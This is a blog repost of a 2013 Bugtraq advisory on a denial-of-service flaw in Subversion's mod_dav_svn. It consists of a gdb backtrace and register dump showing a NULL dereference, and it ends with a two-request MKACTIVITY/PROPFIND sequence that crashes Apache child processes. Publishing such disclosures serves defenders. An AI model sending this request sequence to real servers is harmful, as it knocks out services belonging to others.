humaneshaw: Apache Subversion mod_dav_svn DoS via MKACTIVITY/PROPFIND

বৃহস্পতিবার, ৭ মার্চ, ২০১৩

Apache Subversion mod_dav_svn DoS via MKACTIVITY/PROPFIND

Bugtraq mailing list archives

Apache Subversion mod_dav_svn DoS via MKACTIVITY/PROPFIND

From: tytusromekiatomek () hushmail com
Date: Tue, 05 Mar 2013 20:48:23 +0000

######################### # Subversion MKACTIVITY # ######################### # # Authors: # # 22733db72ab3ed94b5f8a1ffcde850251fe6f466 # c8e74ebd8392fda4788179f9a02bb49337638e7b # AKAT-1 # #######################################  # libsvn_fs's svn_fs_file_length() fun # tested on 1.6.17 and few others  (gdb) where #0  0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1 #1  0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so #2  0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so #3  0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8,  what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889 #4  0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655 #5  0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949 #6  0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so #7  0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so #8  0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081 #9  dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681 #10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587 #11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159 #12 0x00007f259e568f9b in ap_invoke_handler (r=r () entry=0x7f2590df10a0) at config.c:377 #13 0x00007f259e579078 in ap_process_request (r=r () entry=0x7f2590df10a0) at http_request.c:282 #14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190 #15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43 #16 0x00007f259e56f8f8 in ap_process_connection (c=c () entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190 #17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg () entry=6) at prefork.c:667 #18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768 #19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696 #20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903 #21 ap_mpm_run (_pconf=_pconf () entry=0x7f259e515028, plog=<optimized out>, s=s () entry=0x7f259e4d6818) at  prefork.c:1107 #22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755 (gdb) (gdb) i r rax            0x7fff6e97e1e0   140735048835552 rbx            0x7fff6e97e1a8   140735048835496 rcx            0x7f2590df7028   139799321079848 rdx            0x0      0 rsi            0x0      0 rdi            0x7fff6e97dec8   140735048834760 rbp            0x3      0x3 rsp            0x7fff6e97de78   0x7fff6e97de78 r8             0x7f2596833ee0   139799415701216 r9             0x1      1 r10            0x1      1 r11            0x1      1 r12            0x4e24   20004 r13            0x7f2590e08028   139799321149480 r14            0x7fff6e97dff0   140735048835056 r15            0x7f2590df7028   139799321079848 rip            0x7f2595db9d60   0x7f2595db9d60 <svn_fs_file_length> eflags         0x246    [ PF ZF IF ] cs             0x33     51 ss             0x2b     43 ds             0x0      0 es             0x0      0 fs             0x0      0 gs             0x0      0 (gdb) x/i $rip => 0x7f2595db9d60 <svn_fs_file_length>: mov    0x30(%rsi),%rax (gdb) x/x $rsi 0x0:    Cannot access memory at address 0x0   Basically it requires >= 2 requests to crash apache child process (in mod_dav_svn / libsvn_fs). -- cut -- 1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1 2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv) -- cut -- EOF

??By Date?? ????? ??By Thread??